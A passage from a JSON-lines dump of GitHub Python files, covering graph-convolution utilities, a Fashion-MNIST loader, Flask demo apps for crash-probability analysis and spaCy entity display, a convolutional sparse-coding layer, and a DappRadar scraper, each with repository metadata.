np.zeros(l)\n mask[idx] = 1\n return np.array(mask, dtype=np.bool)\n\ndef sparse_to_tuple(sparse_mx):\n \"\"\"Convert sparse matrix to tuple representation.\"\"\"\n def to_tuple(mx):\n if not sp.isspmatrix_coo(mx):\n mx = mx.tocoo()\n coords = np.vstack((mx.row, mx.col)).transpose()\n values = mx.data\n shape = mx.shape\n return coords, values, shape\n\n if isinstance(sparse_mx, list):\n for i in range(len(sparse_mx)):\n sparse_mx[i] = to_tuple(sparse_mx[i])\n else:\n sparse_mx = to_tuple(sparse_mx)\n\n return sparse_mx\n\n\ndef preprocess_features(features):\n \"\"\"Row-normalize feature matrix and convert to tuple representation\"\"\"\n return sparse_to_tuple(features)\n\n\ndef normalize_adj(adj):\n \"\"\"Symmetrically normalize adjacency matrix.\"\"\"\n adj = sp.coo_matrix(adj)\n rowsum = np.array(adj.sum(1))\n d_inv_sqrt = np.power(rowsum, -0.5).flatten()\n d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\n d_mat_inv_sqrt = sp.diags(d_inv_sqrt)\n return adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo()\n\n\ndef preprocess_adj(adj):\n \"\"\"Preprocessing of adjacency matrix for simple GCN model and conversion to tuple representation.\"\"\"\n adj_normalized = normalize_adj(adj + 1 * sp.eye(adj.shape[0]))\n return sparse_to_tuple(adj_normalized)\n\n\ndef construct_feed_dict(features, support,labels, placeholders):\n \"\"\"Construct feed dictionary.\"\"\"\n feed_dict = dict()\n feed_dict.update({placeholders['labels']: labels})\n feed_dict.update({placeholders['features']: features})\n feed_dict.update({placeholders['support'][i]: support[i] for i in range(len(support))})\n feed_dict.update({placeholders['num_features_nonzero']: features[1].shape})\n return feed_dict\n\n\ndef graph_padding(graph_topo_list,graph_tezheng_list,word_pad_length,feature_dimension =3):\n graph_topo_new = []\n graph_tezheng_new = []\n for graph_topo in graph_topo_list:\n len_graph = graph_topo.shape[0]\n to_pad_no = word_pad_length - len_graph\n if to_pad_no <= 0:\n g = graph_topo[range(word_pad_length)][:,range(word_pad_length)]\n graph_topo_new.append(g)\n else:\n graph_topo_tmp = 
np.zeros(word_pad_length*word_pad_length).reshape(word_pad_length,word_pad_length)\n for i in range(len_graph):\n graph_topo_tmp[i,:len_graph] = graph_topo.todense()[i,:]\n graph_topo_tmp = sp.csr_matrix(graph_topo_tmp,dtype = int)\n graph_topo_new.append(graph_topo_tmp)\n j = 0\n for graph_tezheng in graph_tezheng_list:\n len_graph = graph_tezheng.shape[0]\n to_pad_no = word_pad_length - len_graph\n if to_pad_no <= 0:\n graph_tezheng_new.append(sp.csr_matrix(graph_tezheng[:word_pad_length,:], dtype = int))\n else:\n tezheng_topad = np.array([[0]* feature_dimension for i in range(to_pad_no)])\n try:\n tezheng_topad = sp.csr_matrix(np.vstack((graph_tezheng.todense(),tezheng_topad)), dtype = int)\n except:\n print(j)\n graph_tezheng_new.append(tezheng_topad)\n j += 1\n return graph_topo_new,graph_tezheng_new\n\n\ndef re_order(tuopu_list,feature_list,y_label):\n raw_all_y = y_label\n max_catogory_no = max(sum(y_label),len(y_label) - sum(y_label))\n tag_d = defaultdict(list)\n for x in range(2):\n tag_d[\"string{0}\".format(x)] = []\n \n tag_index = 0\n for tag in raw_all_y:\n tag_d[\"string{0}\".format(tag)].append(tag_index)\n tag_index += 1\n for i in range(2):\n tag_d[\"string{0}\".format(i)] = tag_d[\"string{0}\".format(i)] * int(max_catogory_no/ len(tag_d[\"string{0}\".format(i)]))\n chancha = max_catogory_no - len(tag_d[\"string{0}\".format(i)])\n tag_d[\"string{0}\".format(i)] += tag_d[\"string{0}\".format(i)][:chancha] \n index_result = [None]*(2 * max_catogory_no)\n for x in range(2):\n index_result[x::2] = tag_d[\"string{0}\".format(x)]\n word_input = list(map(feature_list.__getitem__, index_result))\n tuopu_input = list(map(tuopu_list.__getitem__, index_result))\n y_input = list(map(y_label.__getitem__, index_result))\n return tuopu_input,word_input,y_input\n\n\ndef load_protein_dataset(dataset_name):\n #if dataset_name not in chemical_datasets_list:\n # print_ext('Dataset doesn\\'t exist. 
Options:', chemical_datasets_list)\n # return\n mat = scipy.io.loadmat('datasets/%s.mat' % dataset_name)\n \n input = mat[dataset_name]\n labels = mat['l' + dataset_name.lower()]\n labels = labels - min(labels)\n \n node_labels = input['nl']\n v_labels = 0\n for i in range(node_labels.shape[1]):\n v_labels = max(v_labels, max(node_labels[0, i]['values'][0, 0])[0])\n \n e_labels = 1\n # For each sample\n samples_V = []\n samples_A = []\n max_no_nodes = 0\n for i in range(input.shape[1]):\n no_nodes = node_labels[0, i]['values'][0, 0].shape[0]\n max_no_nodes = max(max_no_nodes, no_nodes)\n V = np.ones([no_nodes, v_labels])\n for l in range(v_labels):\n V[..., l] = np.equal(node_labels[0, i]['values'][0, 0][..., 0], l+1).astype(np.float32)\n samples_V.append(V)\n A = np.zeros([no_nodes, no_nodes])\n for j in range(no_nodes):\n for k in range(input[0, i]['al'][j, 0].shape[1]):\n A[j, input[0, i]['al'][j, 0][0, k]-1] = 1\n samples_A.append(A)\n return np.array(samples_V), np.array(samples_A), np.reshape(labels, [-1])\n", "repo_name": "xiyou3368/SAGE", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 5821, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.zeros", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 24, "usage_type": "attribute"}, {"api_name": "scipy.sparse.isspmatrix_coo", "line_number": 29, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 29, "usage_type": "name"}, {"api_name": "numpy.vstack", "line_number": 31, "usage_type": "call"}, {"api_name": "scipy.sparse.coo_matrix", "line_number": 52, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.isinf", "line_number": 55, "usage_type": "call"}, {"api_name": "scipy.sparse.diags", "line_number": 56, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 56, "usage_type": "name"}, {"api_name": "scipy.sparse.eye", "line_number": 62, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 62, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 86, "usage_type": "call"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 89, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 89, "usage_type": "name"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 96, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 96, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 98, "usage_type": "call"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 100, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 100, "usage_type": "name"}, {"api_name": "numpy.vstack", "line_number": 100, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 111, "usage_type": "call"}, {"api_name": "scipy.io.io.loadmat", "line_number": 136, "usage_type": "call"}, {"api_name": "scipy.io.io", "line_number": 136, "usage_type": "attribute"}, {"api_name": "scipy.io", "line_number": 136, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.equal", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 157, 
"usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 164, "usage_type": "call"}]} +{"seq_id": "71391570726", "text": "import os\nimport gzip\nimport numpy as np\nfrom torch.utils import data\n\n\ndef load_mnist(path, kind='train'):\n \"\"\"Load MNIST data from `path`.\"\"\"\n labels_path = os.path.join(path,\n '%s-labels-idx1-ubyte.gz'\n % kind)\n images_path = os.path.join(path,\n '%s-images-idx3-ubyte.gz'\n % kind)\n\n with gzip.open(labels_path, 'rb') as lbpath:\n labels = np.frombuffer(lbpath.read(), dtype=np.uint8,\n offset=8)\n\n with gzip.open(images_path, 'rb') as imgpath:\n images = np.frombuffer(imgpath.read(), dtype=np.uint8,\n offset=16).reshape(len(labels), 784)\n\n return images, labels\n\n\nclass FashionMNISTDataset(data.Dataset):\n def __init__(self, images, labels, transform=None):\n self.images = images\n self.labels = labels\n self.transform = transform\n\n def __len__(self):\n return self.images.shape[0]\n\n def __getitem__(self, idx):\n X = self.images[idx, :].reshape((28, 28, 1))\n\n if self.transform is not None:\n X = self.transform(X)\n\n y = self.labels[idx]\n return X, y\n", "repo_name": "cloudcell/lenet5-pytorch", "sub_path": "data/fashion_mnist.py", "file_name": "fashion_mnist.py", "file_ext": "py", "file_size_in_byte": 1237, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "gzip.open", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 17, "usage_type": "attribute"}, {"api_name": "gzip.open", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 21, "usage_type": "attribute"}, {"api_name": "torch.utils.data.Dataset", "line_number": 27, "usage_type": "attribute"}, {"api_name": "torch.utils.data", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "72346406885", "text": "from flask import Flask, render_template, request, redirect\nimport process as ps\nimport webbrowser\n\napp = Flask(__name__)\n\n\n@app.route('/check')\ndef sanity_check():\n return 'Si está funcionando', 200\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html'), 404\n\n\n@app.route('/analysis')\ndef analysis():\n return render_template('display_type.html'), 200\n\n\n@app.route('/variables', methods=['GET', 'POST'])\ndef variables():\n display_type = request.form.get(\"display_type\")\n\n if display_type == 'live':\n return render_template('tableu.html')\n elif display_type == 'live02':\n return render_template('tableu02.html')\n elif display_type == 'live03':\n return render_template('tableu03.html')\n elif display_type == 'live04':\n return render_template('tableu04.html')\n elif display_type == 'calc':\n return render_template('calc.html')\n elif display_type == 'dnn':\n return redirect(\"https://colab.research.google.com/drive/12qXsQ2_Sc9kNngT1h2klbaDdIRiR_5NX?usp=sharing\",\n code=302)\n\n return 
render_template('variables.html', display_type=display_type), 200\n\n\n@app.route('/calculate', methods=['GET', 'POST'])\ndef calculate():\n mes = request.form.get(\"mes\")\n day_of_week = request.form.get(\"day_of_week\")\n weather = request.form.get(\"weather\")\n ciudad = request.form.get(\"ciudad\")\n time = request.form.get(\"time\")\n\n probabilidad = ps.get_probabilidad(mes=mes, day_of_week=day_of_week, weather=weather, ciudad=ciudad, time=time )\n\n return render_template('calculate.html', probabilidad=round(probabilidad * 100, 3)), 200\n\n\n@app.route('/')\ndef home():\n return render_template('index.html'), 200\n\n\n@app.route('/home')\ndef main_menu():\n return render_template('index.html'), 200\n\n\n@app.route('/visualize', methods=['GET', 'POST'])\ndef visualize():\n variable = request.form.get(\"variable\")\n\n ps.run(variable)\n\n n = ps.get_id()\n n = int(n) - 1\n\n webbrowser.open_new_tab(f'http://localhost:5000/static/result{n}.jpg')\n\n return render_template('display_type.html'), 200\n\n\nif __name__ == '__main__':\n app.run()\n", "repo_name": "DanielCordovaV/crash-probability-analysis", "sub_path": "webapp/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2166, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 15, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 28, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 46, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 46, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 47, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 47, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 48, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 48, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 49, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 50, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 50, "usage_type": "name"}, {"api_name": 
"process.get_probabilidad", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 64, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 69, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 69, "usage_type": "name"}, {"api_name": "process.run", "line_number": 71, "usage_type": "call"}, {"api_name": "process.get_id", "line_number": 73, "usage_type": "call"}, {"api_name": "webbrowser.open_new_tab", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "42237582447", "text": "import math\nimport torch\nimport torch.nn as nn\nfrom torch.nn.functional import conv1d\nfrom torch.nn.functional import conv2d\nfrom torch.nn.functional import conv3d\nfrom torch.nn.functional import conv_transpose1d\nfrom torch.nn.functional import conv_transpose2d\nfrom torch.nn.functional import conv_transpose3d\nimport scipy.io\nimport numpy as np\nimport os\n\nfrom utils.utils import ShiftedReLU\n\n\nclass ConvSparseLayer(nn.Module):\n \"\"\"\n An implementation of a Convolutional Sparse Layer\n \"\"\"\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1,\n padding=0, lam=0.5, activation_lr=1e-1,\n max_activation_iter=200, rectifier=True, convo_dim=2):\n super().__init__()\n\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.conv_dim = convo_dim\n\n if isinstance(kernel_size, int):\n self.kernel_size = self.conv_dim * (kernel_size,)\n else:\n self.kernel_size = kernel_size\n\n if isinstance(stride, int):\n self.stride = self.conv_dim * (stride,)\n else:\n self.stride = stride\n\n if isinstance(padding, int):\n self.padding = self.conv_dim * (padding,)\n else:\n self.padding = padding\n\n self.activation_lr = activation_lr\n self.max_activation_iter = max_activation_iter\n\n self.filters = nn.Parameter(torch.rand((out_channels, in_channels) +\n self.kernel_size),\n requires_grad=True)\n torch.nn.init.xavier_uniform_(self.filters)\n self.normalize_weights()\n\n if rectifier:\n self.threshold = ShiftedReLU(lam)\n else:\n self.threshold = nn.Softshrink(lam)\n\n if self.conv_dim == 1:\n self.convo = conv1d\n self.deconvo = conv_transpose1d\n elif self.conv_dim == 2:\n self.convo = conv2d\n self.deconvo = conv_transpose2d\n elif self.conv_dim == 3:\n self.convo = conv3d\n self.deconvo = conv_transpose3d\n else:\n raise ValueError(\"Conv_dim must be 1, 2, or 3\")\n\n self.lam = lam\n\n def normalize_weights(self):\n with torch.no_grad():\n norms = torch.norm(self.filters.reshape(\n self.out_channels, self.in_channels, -1), dim=2, keepdim=True)\n norms = torch.max(norms, 1e-12*torch.ones_like(norms)).view(\n (self.out_channels, self.in_channels) +\n len(self.filters.shape[2:])*(1,)).expand(self.filters.shape)\n self.filters.div_(norms)\n\n def reconstructions(self, activations):\n return self.deconvo(activations, self.filters, padding=self.padding,\n stride=self.stride)\n\n def loss(self, images, activations):\n reconstructions = self.reconstructions(activations)\n loss = 0.5 * (1/images.shape[0]) * torch.sum(\n torch.pow(images - reconstructions, 2))\n loss += self.lam * torch.mean(torch.sum(torch.abs(\n activations.reshape(activations.shape[0], -1)), dim=1))\n return loss\n\n 
def u_grad(self, u, images):\n acts = self.threshold(u)\n recon = self.reconstructions(acts)\n e = images - recon\n du = -u\n du += self.convo(e, self.filters, padding=self.padding,\n stride=self.stride)\n du += acts\n return du\n \n def get_output_shape(self, images):\n output_shape = []\n if self.conv_dim >= 1:\n output_shape.append(math.floor(((images.shape[2] + 2 *\n self.padding[0] -\n (self.kernel_size[0] - 1) - 1) /\n self.stride[0]) + 1))\n if self.conv_dim >= 2:\n output_shape.append(math.floor(((images.shape[3] + 2 *\n self.padding[1] -\n (self.kernel_size[1] - 1) - 1) /\n self.stride[1]) + 1))\n if self.conv_dim >= 3:\n output_shape.append(math.floor(((images.shape[4] + 2 *\n self.padding[2] -\n (self.kernel_size[2] - 1) - 1) /\n self.stride[2]) + 1))\n \n return output_shape\n \n\n def activations(self, images, u_init):\n with torch.no_grad():\n output_shape = self.get_output_shape(images)\n # print('input shape', images.shape)\n # print('output shape', output_shape)\n\n# u = torch.zeros([images.shape[0], self.out_channels] +\n# output_shape, device=self.filters.device)\n# u = torch.full([images.shape[0], self.out_channels] +\n# output_shape, fill_value=self.lam, device=self.filters.device)\n u = u_init.detach().clone().to(self.filters.device)\n# for i in range(self.max_activation_iter):\n# du = self.u_grad(u, images)\n# # print(torch.sum(du))\n# # print(\"grad_norm={}, iter={}\".format(torch.norm(du), i))\n# u += self.activation_lr * du\n# if torch.norm(du) < 0.01:\n# break\n b1 = 0.9\n b2 = 0.999\n eps = 1e-8\n m = torch.zeros_like(u)\n v = torch.zeros_like(u)\n for i in range(self.max_activation_iter):\n g = self.u_grad(u, images)\n m = b1 * m + (1-b1) * g\n v = b2 * v + (1-b2) * g**2\n mh = m / (1 - b1**(i+1))\n vh = v / (1 - b2**(i+1))\n u += self.activation_lr * mh / (torch.sqrt(vh) + eps)\n\n return self.threshold(u), u\n\n def forward(self, images, u_init):\n return self.activations(images, u_init)\n \n \n def import_opencv_dir(self, in_dir):\n i = 0\n for f in sorted(os.listdir(in_dir), key=lambda x: str(x)):\n if not f.endswith('.mat'):\n continue\n mat = scipy.io.loadmat(os.path.join(in_dir, f))\n\n dic = torch.from_numpy((mat['weight_vals'].astype(np.float32)))\n\n dic = dic.permute(2,1,0).unsqueeze(1)\n\n dic = dic.float() /1\n\n if self.filters.data[:,:,i,:,:].size() != dic.size():\n raise Exception('Input dictionary size is: ' + str(dic.size()) + ' while model filter size is: ' + str(self.filters.data[:,:,i,:,:].size()))\n\n self.filters.data[:,:,i,:,:] = dic\n\n i += 1\n", "repo_name": "Rosinaweber/locally", "sub_path": "sparse_coding_lime/feature_extraction/conv_sparse_model.py", "file_name": "conv_sparse_model.py", "file_ext": "py", "file_size_in_byte": 6729, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 17, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.rand", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "attribute"}, {"api_name": "utils.utils.ShiftedReLU", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn.Softshrink", "line_number": 57, "usage_type": "call"}, {"api_name": 
"torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.nn.functional.conv1d", "line_number": 60, "usage_type": "name"}, {"api_name": "torch.nn.functional.conv_transpose1d", "line_number": 61, "usage_type": "name"}, {"api_name": "torch.nn.functional.conv2d", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.nn.functional.conv_transpose2d", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.nn.functional.conv3d", "line_number": 66, "usage_type": "name"}, {"api_name": "torch.nn.functional.conv_transpose3d", "line_number": 67, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.pow", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 90, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 107, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 112, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 126, "usage_type": "call"}, {"api_name": "torch.zeros_like", "line_number": 146, "usage_type": "call"}, {"api_name": "torch.zeros_like", "line_number": 147, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 154, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 164, "usage_type": "call"}, {"api_name": "scipy.io.io.loadmat", "line_number": 167, "usage_type": "call"}, {"api_name": "scipy.io.io", "line_number": 167, "usage_type": "attribute"}, {"api_name": "scipy.io", "line_number": 167, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 167, "usage_type": "call"}, {"api_name": "os.path", "line_number": 167, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 169, "usage_type": "attribute"}]} +{"seq_id": "38335696918", "text": "from flask import Flask, url_for, render_template, request\nfrom flaskext.markdown import Markdown\n\n#NLP Part\nimport en_core_web_sm\nfrom spacy import displacy\nnlp = en_core_web_sm.load()\nimport json\n\napp = Flask(__name__)\nMarkdown(app)\n\nHTML_WRAPPER = \"\"\"
    <div style=\"overflow-x: auto; border: 1px solid #e6e9ef; border-radius: 0.25rem; padding: 1rem\">{}</div>
    \"\"\"\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/input', methods=['POST'])\ndef inp():\n return render_template('input.html')\n\n@app.route('/extract', methods=['POST'])\ndef extract():\n if request.method == 'POST':\n raw = request.form['rawtext']\n doc = nlp(raw)\n html = displacy.render(doc, style='ent')\n html = html.replace('\\n\\n', '\\n')\n res = HTML_WRAPPER.format(html)\n \n return render_template('result.html', rawtext=raw, result=res)\n\n@app.route('/review')\ndef review():\n return render_template('review.html')\n\n@app.route('/preview', methods=['POST'])\ndef preview():\n if request.method == 'POST':\n new = request.form['newtext']\n res = new\n\n return render_template('preview.html', newtext=new, result=res)\n\nif __name__ == '__main__':\n app.run(host='localhost', port=8000, debug=True)", "repo_name": "charlescsr/displacify", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1253, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "en_core_web_sm.load", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 10, "usage_type": "call"}, {"api_name": "flaskext.markdown.Markdown", "line_number": 11, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 26, "usage_type": "name"}, {"api_name": "spacy.displacy.render", "line_number": 28, "usage_type": "call"}, {"api_name": "spacy.displacy", "line_number": 28, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 41, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 41, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "4444271251", "text": "import requests\nimport time\nimport json\nimport pandas as pd\nimport numpy as np\nfrom pandas import DataFrame\n\n# id_dict = {\"9928\":\"Forsage-Smartway\",\"10144\":\"EASY-CLUB\",\"8848\":\"MillionMoney\",\"9801\":\"DoubleWay\",\"9696\":\"HEX\",\"10124\":\"Ethrun\",\"9910\":\"Fomo5k\",\"9756\":\"RED-BOX-DAPP\",\"7747\":\"CryptoHands\",\"9823\":\"PyraBank-Hex\",\"8702\":\"Pledgecamp\",\"8843\":\"Shuffle-Monster-V3\",\"9570\":\"Diamond-Dividends\",\"10004\":\"DeFiGroup-ch---ETH\",\"10092\":\"Crypto-Life\"}\n\ndef build_db(input_path:str, save_path:str):\n df = pd.read_csv(input_path)\n index_list = df['index'].values\n scrape_dappradar(index_list, save_path)\n return\n\ndef save_as_csv_dappradar(r_text:str, save_path):\n store_list = []\n r_dict = json.loads(r_text)\n if r_dict[\"success\"] == False:\n print(\"API access failed: success = false\")\n return\n r_contracts = r_dict[\"data\"][\"contracts\"]\n r_info = r_dict[\"data\"][\"info\"]\n for contract in r_contracts:\n if 
r_info[\"author\"] == \"\":\n author = \"NA\"\n else:\n author = r_info[\"author\"]\n line_list = [contract[\"address\"], r_info[\"id\"], r_info[\"title\"].replace(\" \", \"_\"), r_info[\"category\"], author, r_info[\"balance\"], r_info[\"contractsCount\"], r_info[\"rankings\"][\"overall\"]]\n store_list.append(line_list)\n \n store_array = np.array(store_list)\n df = pd.DataFrame(store_array, index = None, columns = ['address', 'id', 'title', 'category', 'author', 'balance', 'contractsCount', 'ranking'])\n file_path = save_path + str(r_info[\"id\"]) + \"_\" + r_info[\"title\"] + \".csv\"\n df.to_csv(file_path)\n return\n\ndef scrape_dappradar(index_list, save_path):\n i = 1\n length = len(index_list)\n for index in index_list:\n # randsleep = np.random.randint(low = 1, high = 5, size = 1)\n # time.sleep(randsleep)\n\n request_link = \"https://dappradar.com/api/dapp/\" + str(index)\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36\",\n \"Connection\": \"keep-alive\",\n \"accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\n \"accept-language\": \"en-US,en;q=0.9,ja;q=0.8,zh-CN;q=0.7,zh-TW;q=0.6,zh;q=0.5\",\n \"cache-control\": \"no-cache\",\n \"pragma\": \"no-cache\",\n \"sec-fetch-dest\": \"document\",\n \"sec-fetch-mode\": \"navigate\",\n \"sec-fetch-site\": \"none\",\n \"sec-fetch-user\": \"?1\",\n \"upgrade-insecure-requests\": \"1\"\n }\n try:\n r = requests.get(request_link, headers = headers, timeout=150).text\n except:\n print(\"connection failed\")\n # save_as_csv_dappradar(r, save_path)\n try:\n save_as_csv_dappradar(r, save_path)\n except:\n print('error')\n \n print(f\"{ i }/{ length } Dapp processed.\")\n i += 1\n # break\n return\n\ndef saveAsCSV(r_json, key, path):\n r_json = eval(r_json)[\"content\"]\n # Load the lists\n stday_list = np.asarray(eval(r_json[\"stday_list\"]))\n balance_list = np.asarray(eval(r_json[\"balance_list\"]))\n datadau_list = np.asarray(eval(r_json[\"datadau_list\"]))\n ethvolume_list = np.asarray(eval(r_json[\"ethvolume_list\"]))\n exchangerangking_list = np.asarray(eval(r_json[\"exchangerangking_list\"]))\n totalrangking_list = np.asarray(eval(r_json[\"totalrangking_list\"]))\n txs_list = np.asarray(eval(r_json[\"txs_list\"]))\n\n # Format the arrays\n Date = stday_list.reshape(len(stday_list), 1)\n Balance = balance_list.reshape(len(balance_list), 1)\n DAU = datadau_list.reshape(len(datadau_list), 1)\n ETH_Vol = ethvolume_list.reshape(len(ethvolume_list), 1)\n Exchange_Rank = exchangerangking_list.reshape(len(exchangerangking_list), 1)\n Total_Rank = totalrangking_list.reshape(len(totalrangking_list), 1)\n Txs = txs_list.reshape(len(txs_list), 1)\n\n # hstack the arrays together\n data_array = np.hstack([Date, Balance, DAU, ETH_Vol, Exchange_Rank, Total_Rank, Txs])\n\n # Turn Array into Dataframe\n df = DataFrame(data_array, index = None, columns = ['Date', 'Balance', 'DAU', 'Vol', 'Cate Rank', 'Total Rank', 'Txs'])\n\n # Save as CSV file\n save_file_name = 